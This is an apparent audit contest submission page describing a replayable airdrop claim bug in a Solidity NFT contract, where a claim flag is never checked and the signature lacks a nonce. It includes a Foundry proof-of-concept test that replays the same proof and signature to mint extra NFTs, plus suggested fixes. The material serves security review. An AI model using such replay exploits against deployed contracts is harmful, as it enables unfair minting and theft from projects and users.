Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: low

Valid

Airdrop claims are replayable - `s_hasClaimedSnowman` is never checked and the signature has no nonce, unlimited repeat NFT mints

s4m0y3d

Root + Impact

Description

SnowmanAirdrop::claimSnowman is intended to allow a single claim per recipient. It sets a s_hasClaimedSnowman[receiver] flag, but that flag is never read anywhere, so there is no double-claim protection. Combined with an EIP-712 message that contains no nonce, a recipient (or anyone holding the recipient's published signature) can re-fund the recipient's Snow balance back to its snapshot value and replay the exact same Merkle proof and signature to mint additional NFTs — repeatedly

The claim function writes the guard flag but nothing ever checks it:

// state

mapping(address => bool) private s_hasClaimedSnowman; // written, never read

function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s)

external

nonReentrant

{

if (receiver == address(0)) revert SA__ZeroAddress();

if (i_snow.balanceOf(receiver) == 0) revert SA__ZeroAmount();

if (!_isValidSignature(receiver, getMessageHash(receiver), v, r, s)) revert SA__InvalidSignature();

uint256 amount = i_snow.balanceOf(receiver);

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(receiver, amount))));

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) revert SA__InvalidProof();

i_snow.safeTransferFrom(receiver, address(this), amount);

s_hasClaimedSnowman[receiver] = true; // <-- set, but never enforced

emit SnowmanClaimedSuccessfully(receiver, amount);

i_snowman.mintSnowman(receiver, amount);

}

The signed message has no nonce or deadline:

function getMessageHash(address receiver) public view returns (bytes32) {

if (i_snow.balanceOf(receiver) == 0) revert SA__ZeroAmount();

uint256 amount = i_snow.balanceOf(receiver);

return _hashTypedDataV4(

keccak256(abi.encode(MESSAGE_TYPEHASH, SnowmanClaim({receiver: receiver, amount: amount})))

);

}

Two compounding root causes.

Risk

Likelihood:

High (re-funding the balance is cheap and Snow is freely obtainable).

Impact:

High (unbounded NFT mint for whitelisted recipients; signature replay).
The one-claim-per-recipient invariant is broken; whitelisted recipients can mint unbounded NFTs over time.
Because there is no nonce, a captured signature is replayable by anyone, so "claim on behalf of" can be repeated without renewed consent every time the balance is topped up.

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console2} from "forge-std/Test.sol";

import {Snow} from "../src/Snow.sol";

import {Snowman} from "../src/Snowman.sol";

import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";

import {MockWETH} from "../src/mock/MockWETH.sol";

import {Helper} from "../script/Helper.s.sol";

/// @notice PoC: a claimer can claim the airdrop MORE THAN ONCE.

/// Root cause: SnowmanAirdrop never reads s_hasClaimedSnowman, and the

/// EIP-712 message has no nonce. Re-funding the receiver's Snow balance

/// back to its snapshot value lets the SAME merkle proof + SAME signature

/// be replayed indefinitely, minting extra NFTs each time.

contract PoC_DoubleClaim is Test {

Snow snow;

Snowman nft;

SnowmanAirdrop airdrop;

MockWETH weth;

Helper deployer;

// Same merkle data as the official test suite

bytes32 alProofA = 0xf99782cec890699d4947528f9884acaca174602bb028a66d0870534acf241c52;

bytes32 alProofB = 0xbc5a8a0aad4a65155abf53bb707aa6d66b11b220ecb672f7832c05613dba82af;

bytes32 alProofC = 0x971653456742d62534a5d7594745c292dda6a75c69c43a6a6249523f26e0cac1;

bytes32[] AL_PROOF = [alProofA, alProofB, alProofC];

bytes32 bobProofA = 0x51c4b9a3cc313d7d7325f2d5d9e782a5a484e56a38947ab7eea7297ec86ff138;

bytes32 bobProofB = 0xbc5a8a0aad4a65155abf53bb707aa6d66b11b220ecb672f7832c05613dba82af;

bytes32 bobProofC = 0x971653456742d62534a5d7594745c292dda6a75c69c43a6a6249523f26e0cac1;

bytes32[] BOB_PROOF = [bobProofA, bobProofB, bobProofC];

address alice;

uint256 alKey;

address bob;

uint256 bobKey;

address satoshi;

function setUp() public {

deployer = new Helper();

(airdrop, snow, nft, weth) = deployer.run();

(alice, alKey) = makeAddrAndKey("alice");

(bob, bobKey) = makeAddrAndKey("bob");

satoshi = makeAddr("gas_payer");

}

function test_claim_can_be_replayed_for_extra_nfts() public {

// ---- First (legitimate) claim ----

vm.prank(alice);

snow.approve(address(airdrop), type(uint256).max); // approve generously

bytes32 alDigest = airdrop.getMessageHash(alice);

(uint8 v, bytes32 r, bytes32 s) = vm.sign(alKey, alDigest);

vm.prank(satoshi);

airdrop.claimSnowman(alice, AL_PROOF, v, r, s);

assertEq(nft.balanceOf(alice), 1, "first claim minted 1");

assertEq(snow.balanceOf(alice), 0, "snow moved to airdrop");

// ---- Re-fund alice's Snow back to her snapshot value (1) ----

// Any source works; here bob simply sends his 1 Snow to alice.

vm.prank(bob);

snow.transfer(alice, 1);

assertEq(snow.balanceOf(alice), 1, "balance restored to snapshot");

// ---- Replay the SAME proof + SAME signature ----

// No nonce, and s_hasClaimedSnowman is never checked.

vm.prank(satoshi);

airdrop.claimSnowman(alice, AL_PROOF, v, r, s);

assertEq(nft.balanceOf(alice), 2, "DOUBLE CLAIM: alice now holds 2 NFTs");

assertTrue(airdrop.getClaimStatus(alice), "guard flag was set but never enforced");

console2.log("Alice NFT balance after replay:", nft.balanceOf(alice));

}

Recommended Mitigation

error SA__AlreadyClaimed();

if (s_hasClaimedSnowman[receiver]) revert SA__AlreadyClaimed();

// ... existing checks ...

s_hasClaimedSnowman[receiver] = true; // set before the external mint (CEI)

i_snowman.mintSnowman(receiver, amount);

Include an incrementing `s_nonces[receiver]` in `MESSAGE_TYPEHASH` / `getMessageHash` so a signature cannot be reused even if the single-claim flag were ever relaxed.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 9 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[L-01] Missing Claim Status Check Allows Multiple Claims in SnowmanAirdrop.sol::claimSnowman

# Root + Impact   **Root:** The [`claimSnowman`](https://github.com/CodeHawks-Contests/2025-06-snowman-merkle-airdrop/blob/b63f391444e69240f176a14a577c78cb85e4cf71/src/SnowmanAirdrop.sol#L44) function updates `s_hasClaimedSnowman[receiver] = true` but never checks if the user has already claimed before processing the claim, allowing users to claim multiple times if they acquire more Snow tokens. **Impact:** Users can bypass the intended one-time airdrop limit by claiming, acquiring more Snow tokens, and claiming again, breaking the airdrop distribution model and allowing unlimited NFT minting for eligible users. ## Description * **Normal Behavior:** Airdrop mechanisms should enforce one claim per eligible user to ensure fair distribution and prevent abuse of the reward system. * **Specific Issue:** The function sets the claim status to true after processing but never validates if `s_hasClaimedSnowman[receiver]` is already true at the beginning, allowing users to claim multiple times as long as they have Snow tokens and valid proofs. ## Risk **Likelihood**: Medium * Users need to acquire additional Snow tokens between claims, which requires time and effort * Users must maintain their merkle proof validity across multiple claims * Attack requires understanding of the missing validation check **Impact**: High * **Airdrop Abuse**: Users can claim far more NFTs than intended by the distribution mechanism * **Unfair Distribution**: Some users receive multiple rewards while others may receive none * **Economic Manipulation**: Breaks the intended scarcity and distribution model of the NFT collection ## Proof of Concept Add the following test to TestSnowMan.t.sol ```Solidity function testMultipleClaimsAllowed() public { // Alice claims her first NFT vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest = airdrop.getMessageHash(alice); (uint8 v, bytes32 r, bytes32 s) = vm.sign(alKey, aliceDigest); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v, r, s); assert(nft.balanceOf(alice) == 1); assert(airdrop.getClaimStatus(alice) == true); // Alice acquires more Snow tokens (wait for timer and earn again) vm.warp(block.timestamp + 1 weeks); vm.prank(alice); snow.earnSnow(); // Alice can claim AGAIN with new Snow tokens! vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest2 = airdrop.getMessageHash(alice); (uint8 v2, bytes32 r2, bytes32 s2) = vm.sign(alKey, aliceDigest2); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v2, r2, s2); // Second claim succeeds! assert(nft.balanceOf(alice) == 2); // Alice now has 2 NFTs } ``` ## Recommended Mitigation **Add a claim status check at the beginning of the function** to prevent users from claiming multiple times. ```diff // Add new error + error SA__AlreadyClaimed(); function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s) external nonReentrant { + if (s_hasClaimedSnowman[receiver]) { + revert SA__AlreadyClaimed(); + } + if (receiver == address(0)) { revert SA__ZeroAddress(); } // Rest of function logic... s_hasClaimedSnowman[receiver] = true; } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!